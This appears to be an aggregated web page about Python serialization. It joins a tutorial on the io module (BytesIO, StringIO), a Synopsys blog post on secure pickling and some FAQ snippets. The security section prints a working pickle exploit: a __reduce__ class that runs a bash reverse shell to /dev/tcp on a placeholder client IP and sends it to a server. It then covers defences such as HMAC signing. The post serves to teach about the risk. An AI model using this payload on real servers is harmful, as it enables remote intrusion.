What is the process used to convert an object to a stream of bytes that can be saved in a file in Python?

Python io module allows us to manage the file-related input and output operations. The advantage of using the IO module is that the classes and functions available allows us to extend the functionality to enable writing to the Unicode data.

Python IO Module

There are many ways in which we can use the io module to perform stream and buffer operations in Python. We will demonstrate a lot of examples here to prove the point. Let’s get started.

Python BytesIO

Just like what we do with variables, data can be kept as bytes in an in-memory buffer when we use the io module’s Byte IO operations. Here is a sample program to demonstrate this:

import io stream_str = io.BytesIO(b"JournalDev Python: \x00\x01") print(stream_str.getvalue())

Let’s see the output for this program:

What is the process used to convert an object to a stream of bytes that can be saved in a file in Python?
The getvalue() function just takes the value from the Buffer as a String.

Python StringIO

We can even use StringIO as well which is extremely similar in use to BytesIO. Here is a sample program:

import io data = io.StringIO() data.write('JournalDev: ') print('Python.', file=data) print(data.getvalue()) data.close()

Let’s see the output for this program:

What is the process used to convert an object to a stream of bytes that can be saved in a file in Python?
Notice that we even closed the buffer after we’re done with the buffer. This helps save buffer memory as they store data in-memory. Also, we used the print method with an optional argument to specify an IO stream of the variable, which is perfectly compatible with a print statement.

Reading using StringIO

Once we write some data to the StringIO buffer, we can read it as well. Let’s look at a code snippet:

import io input = io.StringIO('This goes into the read buffer.') print(input.read())

Let’s see the output for this program:

What is the process used to convert an object to a stream of bytes that can be saved in a file in Python?

Reading file using StringIO

It is also possible to read a file and stream it over a network as Bytes. The io module can be used to convert a media file like an image to be converted to bytes. Here is a sample program:

import io file = io.open("whale.png", "rb", buffering = 0) print(file.read())

Let’s see the output for this program:

What is the process used to convert an object to a stream of bytes that can be saved in a file in Python?
For this program to run, we had a whale.png image present in our current directory.

io.open() vs os.open()

The io.open() function is a much preferred way to perform I/O operations as it is made as a high-level interface to peform file I/O. It wraps the OS-level file descriptor in an object which we can use to access the file in a Pythonic way. The os.open() function takes care of the lower-level POSIX syscall. It takes input POSIX based arguments and returns a file descriptor which represents the opened file. It does not return a file object; the returned value will not have read() or write() functions. Overall, io.open() function is just a wrapper over os.open() function. The os.open() function just also sets default config like flags and mode too while io.open() doesn’t to it and depends on the values passed to it.

Conclusion

In this lesson, we studied simple operations of python IO module and how we can manage the Unicode characters with BytesIO as well. However, if you are looking for complete file operations such as delete and copy a file then read python read file. Reference: API Doc

  • Home
  • Application Security
  • Blog

Posted by on Tuesday, November 18, 2014

In Python, you can use pickle to serialize (deserialize) an object structure into (from) a byte stream. Here are best practices for secure Python pickling.

By Ashutosh Agrawal, senior consultant, and Arvind Balaji, associate consultant, Synopsys

Pickle in Python is primarily used in serializing and deserializing a Python object structure. In other words, it’s the process of converting a Python object into a byte stream to store it in a file/database, maintain program state across sessions, or transport data over the network. The pickled byte stream can be used to re-create the original object hierarchy by unpickling the stream. This whole process is similar to object serialization in Java or .Net.

When a byte stream is unpickled, the pickle module creates an instance of the original object first and then populates the instance with the correct data. To achieve this, the byte stream contains only the data specific to the original object instance. But having just the data alone may not be sufficient. To successfully unpickle the object, the pickled byte stream contains instructions to the unpickler to reconstruct the original object structure along with instruction operands, which help in populating the object structure.

According to the pickle module documentation, the following types can be pickled:

  • None, true, and false
  • Integers, long integers, floating point numbers, complex numbers
  • Normal and Unicode strings
  • Tuples, lists, sets, and dictionaries containing only picklable objects
  • Functions defined at the top level of a module
  • Built-in functions defined at the top level of a module
  • Classes that are defined at the top level of a module

Pickle allows different objects to declare how they should be pickled using the __reduce__ method. Whenever an object is pickled, the __reduce__ method defined by it gets called. This method returns either a string, which may represent the name of a Python global, or a tuple describing how to reconstruct this object when unpickling.

Generally the tuple consists of two arguments:

  • A callable (which in most cases would be the name of the class to call)
  • Arguments to be passed to the above callable

The pickle library will pickle each component of the tuple separately, and will call the callable on the provided arguments to construct the new object during the process of unpickling.

Dangers of Python pickling

Since there are no effective ways to verify the pickle stream being unpickled, it is possible to provide malicious shell code as input, causing remote code execution. The most common attack scenario leading to this would be to trust raw pickle data received over the network. If the connection is unencrypted, the pickle received could have also been modified on the wire. Another attack scenario is when an attacker can access and modify the stored pickle files from caches, file systems, or databases.

The following example code demonstrates a simple client server program. The server connects to a particular port and waits for client to send data. Once it receives the data, it unpickles it.

conn,addr = self.receiver_socket.accept() data = conn.recv(1024) return cPickle.loads(data)

If the client is not trusted, an attacker can get remote code to execute on the server and gain access to it.

class Shell_code(object): def __reduce__(self): return (os.system,('/bin/bash -i >& /dev/tcp/"Client IP"/"Listening PORT" 0>&1',)) shell = cPickle.dumps(Shell_code()) client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect(('Server IP','Server PORT')) client_socket.send(shell)

Best practices in pickle

The pickle module is not inherently insecure. The following best practices allow safe implementation of pickle.

  • An untrusted client or an untrusted server can cause remote code execution. Thus pickle should never be used between unknown parties.
  • Ensure the parties exchanging pickle have an encrypted network connection. This prevents alteration or replay of data on the wire.
  • If having a secure connection is not possible, any alteration in pickle can be verified by using a cryptographic signature. Pickle can be signed before storage or transmission, and its signature can be verified before loading it on the receiver side.
  • In scenarios where the pickle data is stored, review file system permissions and ensure protected access to the data.

The following example code demonstrates cryptographic signature and verification. The cryptographic signature, as mentioned above, helps in detecting any alteration of pickled data. The client uses HMAC to sign the data. It sends the digest value along with the pickled data to the server as shown below.

pickled_data = pickle.dumps(data) digest = hmac.new('shared-key', pickled_data, hashlib.sha1).hexdigest() header = '%s' % (digest) conn.send(header + ' ' + pickled_data)

The server receives the data, computes the digest, and verifies it with the one that was sent.

conn,addr = self.receiver_socket.accept() data = conn.recv(1024) recvd_digest, pickled_data = data.split(' ') new_digest = hmac.new('shared-key', pickled_data, hashlib.sha1).hexdigest() if recvd_digest != new_digest: print 'Integrity check failed' else: unpickled_data = pickle.loads(pickled_data)

What is the process used to convert an object to a stream of bytes that can be saved in a file in Python?

Ashutosh Agrawal

Posted by

Ashutosh Agrawal

What is the process used to convert an object to a stream of bytes that can be saved in a file in Python?

Ashutosh Agrawal is an associate managing consultant at Synopsys. Over the last nine years, he has performed and led a wide variety of application security assessments including penetration tests, secure code reviews, and threat modeling projects. He has deployed static analysis tools, developed SSDLC policies and standards, and has delivered several instructor-led training courses. Ashutosh possesses extensive project management experience as a key member of Synopsys' strategic Software Security In-a-Box and BSIMM initiatives. Ashutosh has a Master's in Computer Science from the University of Southern California and is currently based in Washington DC. In his spare time, he loves to teach Hindi to students via Google Hangout.

More from Building secure software

Is a process in which a byte stream is converted into an object?

De-serialization or unpickling is the inverse of pickling process where a byte stream is converted back to Python object.

What is pickle used for in Python?

Pickle in Python is primarily used in serializing and deserializing a Python object structure. In other words, it's the process of converting a Python object into a byte stream to store it in a file/database, maintain program state across sessions, or transport data over the network.

Can you pickle an object Python?

Python comes with a built-in package, known as pickle , that can be used to perform pickling and unpickling operations. Pickling and unpickling in Python is the process that is used to describe the conversion of objects into byte streams and vice versa - serialization and deserialization, using Python's pickle module.

What is the process of transforming data or an object in memory RAM to a stream of bytes called byte stream?

Serialization is the process of transforming data or an object in memory (RAM) to a stream of bytes called byte streams. These byte streams in a binary file can then be stored in a disk or in a database or sent through a network.